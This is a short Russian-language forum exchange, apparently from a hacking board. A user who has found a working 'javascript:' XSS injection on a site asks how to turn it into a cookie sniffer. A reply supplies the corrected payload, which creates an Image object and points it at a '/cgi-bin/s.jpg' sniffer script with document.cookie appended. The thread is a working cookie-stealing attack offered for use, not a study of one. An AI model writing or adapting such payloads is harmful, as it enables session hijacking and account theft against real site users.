Всем привет! Прошу строго не судить! Я просто не понимаю как логически-верно составить код! Вот такое на сайте проходит HTML: javascript:alert('XSS') А вот подстроить под него античатовский сниффер немогу! Я думал надо HTML: javascript:img.src = "/cgi-bin/s.jpg?"+document.cookie; а не получилось... Помогите, а P.S.<script></script> тама не получается, надо как-то через javascript: это возможно?
Дело в том что у тебя в примере который ты дал ошибка. Для того чтоб сработала Code: javascript: img.src = "/cgi-bin/s.jpg?"+document.cookie; Тебе надо для начало создать обьект img. Т.е. так будет правильно: Code: javascript:[color=green]img=new Image();[/color]img.src= "/cgi-bin/s.jpg?"+document.cookie;